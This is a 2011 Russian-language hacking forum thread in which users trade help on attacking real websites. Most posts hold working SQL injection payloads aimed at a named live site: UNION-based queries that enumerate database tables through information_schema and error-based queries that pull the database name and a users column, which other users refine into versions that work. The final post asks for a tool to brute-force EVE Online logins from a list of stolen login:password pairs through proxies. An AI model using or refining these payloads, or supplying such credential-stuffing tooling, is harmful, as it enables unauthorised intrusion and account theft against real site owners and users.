05.07.2011, 13:30
|
|
Новичок
Регистрация: 05.06.2011
Сообщений: 2
С нами:
7862006
Репутация:
0
|
|
привет
нужна помосчь!
есть скуля но при дописывании limit или
Код:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.schemata+where+table_name%3E'table_200'#
сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз! |
|
|
05.07.2011, 13:43
|
|
Новичок
Регистрация: 05.06.2011
Сообщений: 2
С нами:
7862006
Репутация:
0
|
|
Сообщение от Фараон
Ссылку. Античат - форум экстрасенсов.
Код:
http://www.bsgv.ru/ipo_calc.php?bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.tables+where%20table_name%3Etable_200#
|
|
|
|
05.07.2011, 13:45
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами:
8762549
Репутация:
1069
|
|
Сообщение от FreN4
привет
нужна помосчь!
есть скуля но при дописывании limit или
Код:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.schemata+where+table_name%3E'table_200'#
сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз! какой вы интересный товарищ)
Код:
+UNION+SELECT+1,2,3,4,group_concat(0x3a,table_name),6,...,151+from+information_schema.tables%23
или
Код:
+UNION+SELECT+1,2,3,4,table_name,6,...,151+from+information_schema.tables+limit+0,1%23
а имя таблицы в кавычках, захексить бы
|
|
|
|
05.07.2011, 19:41
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от FreN4
привет
нужна помосчь!
есть скуля но при дописывании limit или
Код:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.schemata+where+table_name%3E'table_200'#
сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз! На сколько знаю, group_concat() выводит только первые 1024 символа и с limit он не работает...
|
|
|
|
05.07.2011, 22:11
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
С нами:
8678819
Репутация:
0
|
|
Использую конструкцию:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
DATABASE()
, 1, 63), FLOOR(RAND(0)*2))) --
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
SELECT user_1 FROM users
, 1, 63), FLOOR(RAND(0)*2))) --
Выдаёт ошибку, но команду не выполняет:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT user_1 FROM users, 1, 63), FLOOR(RAND(0)*2))) -- '' at line 1
В итоге возникает вопрос. Как заставить выполниться команду
Сообщение от None
SELECT user_1 FROM users
Название столбца и таблицы точно эти. |
|
|
|
05.07.2011, 22:20
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от swad
Использую конструкцию:
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
Выдаёт ошибку, но команду не выполняет:
В итоге возникает вопрос. Как заставить выполниться команду
Название столбца и таблицы точно эти.
добавь к конструкции limit 0,1
вот пример:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT user_1 FROM users limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
|
|
|
|
06.07.2011, 02:09
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
С нами:
8678819
Репутация:
0
|
|
winstrool
Спасибо)
|
|
|
|
06.07.2011, 02:53
|
|
Новичок
Регистрация: 05.06.2011
Сообщений: 2
С нами:
7862006
Репутация:
0
|
|
Сообщение от winstrool
На сколько знаю, group_concat() выводит только первые 1024 символа и с limit он не работает...
я пробовал и просто с лимитом и посмотри какой я запрос выше прислал,там всё я сделал правильно!)))))
|
|
|
|
06.07.2011, 10:00
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
FreN4,
Узнаем количество таблиц, исключая information_schema:
Код:
2-1+UNION+SELECT+1,2,3,4,count(*),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.tables+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61+--+
Выводим таблицы с начала:
Код:
2-1+UNION+SELECT+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.tables+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61+--+
Выводим таблицы после binn_categs:
Код:
2-1+UNION+SELECT+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151+from+information_schema.tables+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61+and+table_name>0x62696E6E5F636174656773+--+
|
|
|
|
06.07.2011, 12:13
|
|
Новичок
Регистрация: 27.10.2010
Сообщений: 5
С нами:
8180246
Репутация:
0
|
|
Дано: веб-морда для логина https://www.eveonline.com/login.asp
список вида логин:пасс
Нужно: программа, умеющая работать с таким видом брутфорса через прокси.
Насколько я понял, WBF не имеет функции перебора по такому списку, а иных возможных вариантов не знаю.
P.S. Также есть альтернативная веб-морда https://gate.eveonline.com/LogOn но её стоит использовать только в качестве резервной т.к. она, по всей видимости, более медленная.
|
|
|
|
|
Похожие темы
Комбинированный вид
